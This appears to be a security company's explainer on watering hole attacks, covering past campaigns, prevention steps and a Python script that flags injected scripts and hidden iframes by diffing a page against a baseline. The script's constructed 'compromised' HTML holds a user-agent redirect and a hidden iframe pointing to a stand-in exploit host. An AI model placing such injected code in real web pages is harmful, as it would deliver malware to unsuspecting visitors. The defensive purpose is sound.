
Got a favourite website, or one you need for work every day? That’s your “watering hole”. In a watering hole attack, cyber criminals plant a trap on that website to infect your computer and network without you realising. We’ll tell you how to stay safe.

The watering hole is poisoned

In a watering hole attack, the attacker first identifies a website that is regularly visited by staff of a specific organisation or sector. The attacker then compromises that website, turning it into the ‘watering hole’, and plants code that delivers malware to its visitors. The injected code either exploits a vulnerability in the visitor’s browser or its plugins, or tricks the visitor into running a download (a fake update prompt, for example). The payload is typically a Remote Access Trojan (RAT), which gives the attacker a foothold inside the target organisation.

When a device belonging to a member of the target organisation is infected simply by visiting the page, with nothing for the user to click and nothing for them to notice, this is called a ‘drive-by’ download. The attacker now controls the device that visited the watering hole, and can use it as a stepping stone into the organisation’s network.

Spying, stealing and even espionage

As with other tactics, the goal is to steal personal information, banking details or intellectual property, or to conduct espionage. A foothold on one device can give the attacker access to business systems and assets, and the information gathered there may be used to plan further cyber-attacks.

Some real-life watering hole attacks

One well-documented watering hole attack was the multi-phase VOHO campaign of 2012. The attackers compromised a local government website in Maryland, USA and the website of a regional bank in Massachusetts, as well as other sites linked to the promotion of democracy in repressive regions. The intended targets were financial services, government entities and the defence industry, and the attack used redirects to an exploit site that infected visitors with the Gh0st RAT. The campaign redirected around 32,000 visitors from 731 organisations worldwide to the exploit site, where approximately 4,000 hosts are believed to have downloaded the exploit files, an infection rate of roughly 12%.

From 2017 to 2018, a group known as “LuckyMouse” or “Iron Tiger”, widely attributed to Chinese-speaking operators, ran a country-wide watering hole campaign. The reported target of this espionage attempt was the national data centre of an undisclosed Central Asian country: the attackers injected malicious JavaScript into official government websites, so that visitors to those sites were served the group’s malware.

The ‘Holy Water’ attack, active from 2019, targeted religious and charitable organisations in Asia. Visitors to the compromised sites were shown a fake Adobe Flash update prompt, and the malware was downloaded when they accepted it. The motivation was never established, but the campaign could well have served espionage.

Why are watering hole attacks a risk for my company or organisation?

A watering hole attack, like spear phishing, is targeted, and like a supply chain attack it reaches the victim through a trusted third party. Because the victim is lured to a website rather than having their own network probed directly, the organisation is far less likely to notice the intrusion, and these attacks are hard to detect proactively.

Raising awareness of the issue is the first step. Following standard security good practice always helps, and some additional measures are worthwhile: identify the websites employees visit most, then inspect and monitor them regularly for unexpected changes. Also consider what additional malware protection can be added to employees’ browsers and devices.

Faced with an increasing number of sophisticated and imaginative attack tactics, many firms are adopting a ‘Zero Trust’ approach to IT security. Rather than setting up a perimeter and giving users free rein inside it, Zero Trust verifies the user and device at each access as they move around your network from application to application. A device infected at a watering hole therefore cannot simply roam the network, which closes gaps that cyber criminals would otherwise exploit.

How to prevent watering hole attacks on your business or organisation

You can help your organisation avoid watering hole attacks by taking the following precautions:

  1. Keep anti-virus and software patches up to date; a drive-by download relies on an unpatched browser or plugin.
  2. Use browser-based security tools that warn users about sites with a poor reputation and add a further layer of malware protection.
  3. Use a good email security solution and consider a secure web gateway (SWG) to filter out suspicious web traffic.
  4. Inspect and monitor the websites employees access most often, looking for injected code and malware.
  5. Set up a way to promptly tell staff not to browse sites that have been identified as compromised.
  6. Inspect all traffic from third-party and external sites before it reaches employees.
  7. Assess, understand and govern the whole length of your supply chain (a watering hole attack is a form of supply chain attack).
  8. Inform, educate and train staff about the nature of the threat and how to avoid it.
  9. Never click unknown or suspicious links in emails or on websites, and take care when browsing at all times.
  10. Consider adopting a ‘zero trust’ security approach for your organisation.
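Points 4 and 6, and the advice above to inspect and monitor the sites staff visit most, are easier to act on with a concrete check. The script below is an added example written for this page, not code from the original article or from any of the campaigns it describes. It takes a known-good copy of a page as a baseline and compares a fresh copy against it, reporting any new third-party script, any new or changed inline script, and any new iframe, with hidden iframes and off-site scripts rated high because those are the hallmarks of the injected redirects described earlier. Both HTML samples and all hostnames (reserved `.example` names) are constructed for the demonstration; the inline “profiling” snippet in the injected copy is illustrative only.

```python
"""Baseline-and-diff check for injected scripts and hidden iframes on a
frequently visited page. Added example; the HTML below is constructed and
the hostnames are reserved .example names, not real sites."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "council.example"  # assumed host of the page being monitored

# Constructed known-good copy of the page, captured when the baseline was taken.
BASELINE_HTML = """<html><head>
<script src="https://council.example/js/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body><h1>Planning applications</h1></body></html>"""

# Constructed copy of the same page after a watering hole style compromise:
# one extra third-party script, one extra inline snippet that profiles the
# visitor and redirects, and a zero-size iframe pulling in the exploit page.
INJECTED_HTML = """<html><head>
<script src="https://council.example/js/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://stat-counter.example/c.js"></script>
<script>if (/Windows NT 6/.test(navigator.userAgent)) { location.href = "https://update-check.example/"; }</script>
</head><body><h1>Planning applications</h1>
<iframe src="https://update-check.example/i.html" width="0" height="0" style="display:none"></iframe>
</body></html>"""


class _Inventory(HTMLParser):
    """Collects external script URLs, SHA-256 of inline scripts, and iframes."""

    def __init__(self):
        super().__init__()
        self.external = set()   # src attributes of <script src=...>
        self.inline = set()     # sha256 of each inline <script> body
        self.iframes = {}       # iframe src -> attribute dict
        self._buf = None        # collects the body of the inline script being read

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.add(a["src"])
            else:
                self._buf = []
        elif tag == "iframe":
            self.iframes[a.get("src", "")] = a

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            code = "".join(self._buf).strip()
            self.inline.add(hashlib.sha256(code.encode()).hexdigest())
            self._buf = None


def _inventory(html):
    p = _Inventory()
    p.feed(html)
    p.close()
    return p


def _hidden(attrs):
    """True for the zero-size / display:none iframes used to load exploit pages."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def find_injections(baseline_html, current_html, site_host):
    """Return a list of (severity, message) for content present now but absent
    from the baseline. An unchanged page yields an empty list."""
    base, cur = _inventory(baseline_html), _inventory(current_html)
    findings = []
    for src in sorted(cur.external - base.external):
        host = urlparse(src).netloc
        sev = "high" if host and host != site_host else "medium"
        findings.append((sev, f"new script from {host or 'same origin'}: {src}"))
    for digest in sorted(cur.inline - base.inline):
        findings.append(("medium", f"new or changed inline script sha256:{digest[:16]}"))
    for src, attrs in cur.iframes.items():
        if src in base.iframes:
            continue
        kind = "hidden" if _hidden(attrs) else "visible"
        findings.append(("high" if kind == "hidden" else "medium", f"new {kind} iframe: {src}"))
    return findings


if __name__ == "__main__":
    for sev, msg in find_injections(BASELINE_HTML, INJECTED_HTML, SITE_HOST):
        print(f"[{sev}] {msg}")
```

Run against the two constructed copies it reports three findings: the off-site `stat-counter.example` script (high), the new inline redirect (medium) and the hidden iframe (high). In practice you would fetch the real page on a schedule in place of `INJECTED_HTML`, and also fetch and hash the body of each baseline script such as `app.js`, since an attacker who edits an existing file rather than adding a new tag would not show up in a tag-level diff.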

Useful links

Find out more about Zero Trust Cyber Security

Cyber security help

As applied cyber security experts, we support hundreds of businesses and schools across the UK. Contact us to discuss how we can help you.